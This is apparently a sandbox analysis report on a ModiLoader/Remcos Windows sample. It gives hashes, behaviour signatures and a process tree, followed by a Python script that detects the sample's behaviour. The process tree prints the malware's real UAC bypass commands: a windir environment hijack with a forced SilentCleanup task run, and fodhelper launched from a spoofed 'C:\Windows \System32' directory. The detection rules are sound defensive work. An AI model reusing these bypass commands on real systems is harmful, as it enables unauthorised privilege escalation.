Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    08/07/2020, 10:06

General

  • Target

    de2ebb27023e08b71d091c7695c59192.exe

  • Size

    649KB

  • MD5

    de2ebb27023e08b71d091c7695c59192

  • SHA1

    6b5d2d11a1b712b38d6d699612cdd66fcc755db8

  • SHA256

    e67dd040ce53fbf4e0ef2121dabd060c5c764ede3eec55801376b144a0f40419

  • SHA512

    39c16d7f3672c6ee3c848e898a56b678bc7127ed1af0984a726a4557d8cd73ee96cdea1aa97f79e92680acfed7f666fd35e9f456acf15a54308cbc0eedc99071

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ServiceHost packer 123 IoCs

    Detects ServiceHost packer used for .NET malware

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 530 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe
    "C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
      PID:3836
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        3⤵
        PID:3864
        • C:\Windows\SysWOW64\reg.exe
          reg delete hkcu\Environment /v windir /f
          4⤵
          • Modifies registry key
          PID:856
        • C:\Windows\SysWOW64\reg.exe
          reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
          4⤵
          • Modifies registry key
          PID:3328
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
          4⤵
          PID:3104
        • C:\Windows\SysWOW64\reg.exe
          reg delete hkcu\Environment /v windir /f
          4⤵
          • Modifies registry key
          PID:2488
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Runex.bat
        3⤵
        PID:2764
        • C:\Windows \System32\fodhelper.exe
          "C:\Windows \System32\fodhelper.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2960
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
            5⤵
            PID:1196
    • C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:3912
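The process tree above contains two well-known UAC bypass patterns that are worth hunting for in process-creation telemetry: the batch script rewrites the user-writable HKCU\Environment\windir value and then forces the high-integrity SilentCleanup scheduled task to run (which resolves %windir% from that value), and a second script launches an auto-elevating fodhelper.exe copy from "C:\Windows \System32" (note the trailing space after "Windows"), a mock trusted directory used to sideload the dropped DLL. The following is an added detection example, not code from tria.ge or from the report; it runs the four rules over the command lines shown in the tree and correlates the hijack and the task launch to the same parent process. The event field names (pid, ppid, image, cmdline) are an assumed Sysmon-like shape, the regexes are mine, and the last event is a constructed benign control.

```python
import re
from collections import defaultdict

# Rules are (tag, regex, event field). Each one matches a behaviour visible in the
# sandbox process tree; the regexes are this example's own, not Triage signatures.
RULES = [
    # Setup half of the %windir% bypass: an unprivileged 'reg add' of the per-user
    # windir value, which the high-integrity SilentCleanup task later expands.
    ("env_windir_hijack",
     re.compile(r"\breg(?:\.exe)?\s+add\s+hk(?:cu|ey_current_user)\\environment\s+/v\s+windir\b", re.I),
     "cmdline"),
    # Trigger half: forcing that task to run right after the variable is set.
    ("silentcleanup_run",
     re.compile(r"\bschtasks(?:\.exe)?\b.*?/run\b.*?/tn\s+\\?microsoft\\windows\\diskcleanup\\silentcleanup\b", re.I),
     "cmdline"),
    # A space after "Windows" or "Program Files" makes a mock trusted directory:
    # not the real system path, but close enough for lax prefix checks, so an
    # auto-elevating binary copied there can sideload an attacker DLL.
    ("mock_trusted_dir",
     re.compile(r'^"?[a-z]:\\(?:windows|program files(?: \(x86\))?) +\\', re.I),
     "image"),
    # Batch staging out of the world-writable C:\Users\Public.
    ("public_bat",
     re.compile(r'\\users\\public\\[^\\\s"]+\.bat\b', re.I),
     "cmdline"),
]

# Events 0-8 are the command lines from the report's process tree; event 9 is a
# constructed benign control to show the rules do not fire on ordinary batch use.
SAMPLE_EVENTS = [
    {"pid": 3888, "ppid": 0,    "image": r"C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe"'},
    {"pid": 3836, "ppid": 3888, "image": r"C:\Windows\SysWOW64\TapiUnattend.exe",
     "cmdline": r'"C:\Windows\System32\TapiUnattend.exe"'},
    {"pid": 3864, "ppid": 3836, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat"},
    {"pid": 856,  "ppid": 3864, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r"reg delete hkcu\Environment /v windir /f"},
    {"pid": 3328, "ppid": 3864, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r'reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "'},
    {"pid": 3104, "ppid": 3864, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"pid": 2764, "ppid": 3836, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c C:\Users\Public\Runex.bat"},
    {"pid": 2960, "ppid": 2764, "image": r"C:\Windows \System32\fodhelper.exe",
     "cmdline": r'"C:\Windows \System32\fodhelper.exe"'},
    {"pid": 3912, "ppid": 3888, "image": r"C:\Program Files (x86)\internet explorer\ieinstal.exe",
     "cmdline": r'"C:\Program Files (x86)\internet explorer\ieinstal.exe"'},
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",          # constructed benign control
     "cmdline": r"C:\Windows\System32\cmd.exe /c C:\Users\Admin\build.bat"},
]


def tag_event(ev):
    """Return the ordered list of rule tags that fire on one process-creation event."""
    return [tag for tag, rx, field in RULES if rx.search(ev[field])]


def scan(events):
    """Tag every event, then correlate siblings: the windir hijack and the
    SilentCleanup launch must share a parent (the batch script's cmd.exe) to be
    reported as a completed bypass attempt rather than two loose indicators."""
    tagged = {ev["pid"]: tag_event(ev) for ev in events}
    tags_by_parent = defaultdict(set)
    for ev in events:
        tags_by_parent[ev["ppid"]].update(tagged[ev["pid"]])
    bypass_parents = sorted(
        ppid for ppid, tags in tags_by_parent.items()
        if {"env_windir_hijack", "silentcleanup_run"} <= tags
    )
    mock_dir_pids = [pid for pid, tags in tagged.items() if "mock_trusted_dir" in tags]
    return {
        "tags": {pid: t for pid, t in tagged.items() if t},
        "uac_bypass_parents": bypass_parents,
        "mock_dir_pids": mock_dir_pids,
    }


if __name__ == "__main__":
    result = scan(SAMPLE_EVENTS)
    for pid, tags in result["tags"].items():
        print(f"PID {pid}: {', '.join(tags)}")
    print("SilentCleanup bypass staged under parent PID(s):", result["uac_bypass_parents"])
    print("Mock trusted directory launches:", result["mock_dir_pids"])
```

The mock-directory rule deliberately requires at least one space before the backslash, so the genuine "C:\Program Files (x86)\..." path of ieinstal.exe is not flagged; on a live host the same check can be applied to the directory listing of the drive root, since the spoofed folder has to exist on disk for fodhelper.exe to run from it.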

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3888-130-0x0000000010530000-0x0000000010554000-memory.dmp

    Filesize

    144KB

  • memory/3888-124-0x0000000010410000-0x0000000010450000-memory.dmp

    Filesize

    256KB